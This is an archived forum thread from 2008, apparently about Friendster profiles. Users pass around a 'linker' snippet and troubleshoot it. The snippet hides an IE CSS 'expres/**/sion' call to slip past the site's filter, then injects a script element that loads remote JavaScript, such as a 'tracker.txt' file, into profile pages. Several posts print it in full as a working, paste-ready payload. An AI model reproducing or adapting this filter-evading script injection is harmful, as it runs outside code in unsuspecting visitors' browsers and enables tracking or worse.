• ARCHIVES 
  • » new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

ric25
» FTalkAddict
FTalk Level: zero
1969-12-31

Re: new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

@den.hate ^yah,you can put it now in your media box section,and add more tweaks;) goodlak:P:lol:

Last edited by roCksTAriC (2008-04-28 05:26:03)

Ephemeral
» FTalkElite
1969-12-31

Re: new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

To avoid the null part. Try removing your welcome alerts. Just a theory though.
ric25
» FTalkAddict
1969-12-31

and the goodbye alerts also,ive experience that on my sisters profile=) specially when you using firefox..:wallbash:

Last edited by roCksTAriC (2008-04-28 05:43:12)

po123ks
» n00b
1969-12-31

hey bro where to paste the codes in media box or about me
ric25
» FTalkAddict
1969-12-31

^in media box...paste it in media box=)
seductive
» n00b
1969-12-31

problem solve..

Last edited by seductive (2008-04-28 11:51:54)

cklahrckiey
» FTalkFreak
1969-12-31

for example this is your url of your tracker.txt [quote]http://h1.ripway.com/wakakakak/tracker.txt[/quote] and this is the linker... look at the bold parts... [quote]<style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');visibility:hidden">[b]URL OF JS[/b]</a>[/quote] as you can see above said example...if you see the [b]bold[/b] parts.... that is where you'll gonna insert the url of your tracker... so the outcome will be like this [quote]<style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');visibility:hidden">[b]http://h1.ripway.com/wakakakak/tracker.txt[/b]</a>[/quote] i hope you understand.... ahhh ok....sorry if im a slow....

Last edited by cklahrckiey (2008-04-28 11:53:46)

kazuyuki
» n00b
1969-12-31

its not working <">
gnaugh
» n00b
1969-12-31

still working IE6 & FF>>both working guess now[b]'s[/b][b]'ll[/b][b]'bout[/b] [b][i]luckyness[/i][/b]:) [b]@[/b][u][b]sprongky[/b][/u][b][/b]: than'x

Last edited by gnaugh (2008-04-28 16:58:06)

sprongky
» FTalkManiac
1969-12-31

[quote=roCksTAriC]^in media box...paste it in media box=)[/quote] LoL My Welcome Alert dont mess my profile... =)
chokowako_08
» n00b
1969-12-31

the linker is not stable!!!:thumbsdown:
cohleng_mkay
» n00b
1969-12-31

hi seems that my js don't work...anything wrong with my codes? help here <style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');visibility:hidden">http://h1.ripway.com/cohleng/tracker%20april%202008/tracker.txt </a>
chokowako_08
» n00b
1969-12-31

this linker is not stable!! mod!! kindly do something! more FT Gigs outder is requesting for the new linker!!. FT user if you already paste the linker and it work on your profile!! please try not to touch it again! we dont know when it will filtered again!! ok!!:cry:
sprongky
» FTalkManiac
1969-12-31

[b]@chokowako_08 @cohleng_mkay [/b] LoL This Linker Is 100% Working.. you just dont know how to follow intstruction.

Last edited by sprongky (2008-04-29 02:16:54)

bullet_nuue
» FTalker
1969-12-31

[quote=sprongky][b]@chokowako_08 @cohleng_mkay [/b] LoL This Linker Is 100% Working.. you just dont know hot to follow intstruction.[/quote] yup, right... it's working... i'm still use by now..
babiieana_01
» n00b
1969-12-31

diz one isz not workin9`..:angry:
ivynne
» n00b
1969-12-31

its..not working... its working for awhile only..... then my profile back to normal... :crybaby::crybaby::crybaby:
ree54
» n00b
1969-12-31

:thumbsup::thumbsup::thumbsup::thumbsup::thumbsup: tutorial!
lei9182
» FTalker
1969-12-31

is the emote linker not working anymore?
lei9182
» FTalker
1969-12-31

the css linker works... but when i tried to add the js linker, all i could see in my profile is a white blank page... @yomieee avoid spamming...
  • ARCHIVES 
  • » new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

Board footer

© 2024 F Talk

Current time is 10:54

[ 9 queries - 0.094 second ]
Privacy Policy